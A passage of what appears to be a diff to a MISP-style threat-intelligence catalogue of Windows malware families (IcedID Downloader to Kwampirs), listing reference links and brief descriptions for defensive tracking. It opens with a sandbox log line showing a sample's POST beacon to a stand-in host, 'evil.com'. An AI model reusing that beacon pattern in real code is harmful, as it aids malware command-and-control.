[172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 
12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" + ] + }, + "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", + "value": "IcedID Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", + "http://www.kz-cert.kz/page/502" + ] + }, + "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", + "value": "Icefog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", + "https://securelist.com/ice-ix-not-cool-at-all/29111/", + 
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" + ] + }, + "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", + "value": "Ice IX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", + "https://isc.sans.edu/diary/22766" + ] + }, + "uuid": "3afecded-3461-45f9-8159-e8328e56a916", + "value": "IDKEY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" + ] + }, + "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", + "value": "IISniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", + "value": "Imecab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" + ] + }, + "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", + "value": "Imminent Monitor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Foudre" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", + 
"https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" + ] + }, + "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", + "value": "Infy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", + "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + ] + }, + "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", + "value": "InnaputRAT", + "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ] + }, + "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", + "value": "InvisiMole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gozi ISFB", + "IAP", + "Pandemyia" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + 
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" + ] + }, + "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", + "value": "ISFB", + "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. 
The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", + "http://www.clearskysec.com/ismagent/" + ] + }, + "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", + "value": "ISMAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.clearskysec.com/greenbug/" + ] + }, + "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", + "value": "ISMDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", + "https://www.zscaler.com/blogs/research/ispy-keylogger" + ] + }, + "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", + "value": "iSpy Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", + "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" + ] + }, + "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", + "value": "ISR Stealer", + "description": "ISR Stealer is a modified version of the Hackhound Stealer. 
It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", + "value": "IsSpace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" + ] + }, + "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", + "value": "JackPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", + "http://malware-traffic-analysis.net/2017/05/16/index.html", + "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", + "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" + ] + }, + "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", + "value": "Jaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" + ] + }, + "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", + "value": "Jager Decryptor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Reconcyc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", + "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" + ] + }, + "uuid": 
"0f02ea79-5833-46e0-8458-c4a863a5a112", + "value": "Jaku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", + "value": "Jasus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" + ] + }, + "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", + "value": "Jigsaw", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", + "value": "Jimmy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", + "value": "Joanap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", + "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" + ] + }, + "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", + "value": "Joao", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", + "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" + ] + }, + "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", + "value": "Jolob", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", + "http://marcmaiffret.com/vault7/" + ] + }, + "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", + "value": "JQJSNICKER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", + "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + ] + }, + "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", + "value": "JripBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", + "value": "KAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", + "value": "Karagany", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", + "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", + "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" + ] + }, + "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", + "value": "Kardon Loader", + "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. 
The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", + "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", + "https://research.checkpoint.com/banking-trojans-development/" + ] + }, + "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", + "value": "Karius", + "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" + ] + }, + "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", + "value": "KasperAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", + "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + ] + }, + "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", + "value": "Kazuar", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" + ] + }, + "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", + "value": "Kegotip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", + "https://en.wikipedia.org/wiki/Kelihos_botnet" + ] + }, + "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", + "value": "Kelihos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSSL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://citizenlab.ca/2016/11/parliament-keyboy/", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" + ] + }, + "uuid": "28c13455-7f95-40a5-9568-1e8732503507", + "value": "KeyBoy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://twitter.com/smoothimpact/status/773631684038107136", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" + ] + }, + "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", + "value": "APT3 Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", + 
"https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + ] + }, + "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", + "value": "KEYMARBLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", + "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" + ] + }, + "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", + "value": "KHRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", + "value": "Kikothac", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" + ] + }, + "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", + "value": "KillDisk", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasper Internet Non-Security", + "Maple" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://github.com/nyx0/KINS", + "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", + "https://www.youtube.com/watch?v=C-dEOt0GzSE" + ] + }, + "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", + "value": "KINS", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.morphick.com/resources/news/klrd-keylogger" + ] + }, + "uuid": "70459959-5a20-482e-b714-2733f5ff310e", + "value": "KLRD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/zerosum0x0/koadic" + ] + }, + "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", + "value": "Koadic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", + "https://twitter.com/struppigel/status/812726545173401600" + ] + }, + "uuid": "f7674d06-450a-4150-9180-afef94cce53c", + "value": "KokoKrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", + "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", + "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" + ] + }, + "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", + "value": "Konni", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" + ] + }, + "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", + "value": "KoobFace", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bisonal" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", + 
"https://securitykitten.github.io/2014/11/25/curious-korlia.html", + "https://camal.coseinc.com/publish/2013Bisonal.pdf", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", + "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" + ] + }, + "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", + "value": "Korlia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", + "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", + "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", + "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" + ] + }, + "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", + "value": "Kovter", + "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", + "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" + ] + }, + "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", + "value": "KPOT Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BlackMoon" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" + ] + }, + "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", + "value": "KrBanker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", + "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" + ] + }, + "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", + "value": "KrDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Osiris" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", + "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + 
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" + ] + }, + "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", + "value": "Kronos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Barys", + "Gofot", + "Kuaibpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" + ] + }, + "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", + "value": "Kuaibu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" + ] + }, + "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", + "value": "Kuluoz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", + "value": "Kurton", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ] + }, + "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", + "value": "Kwampirs", + "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." 
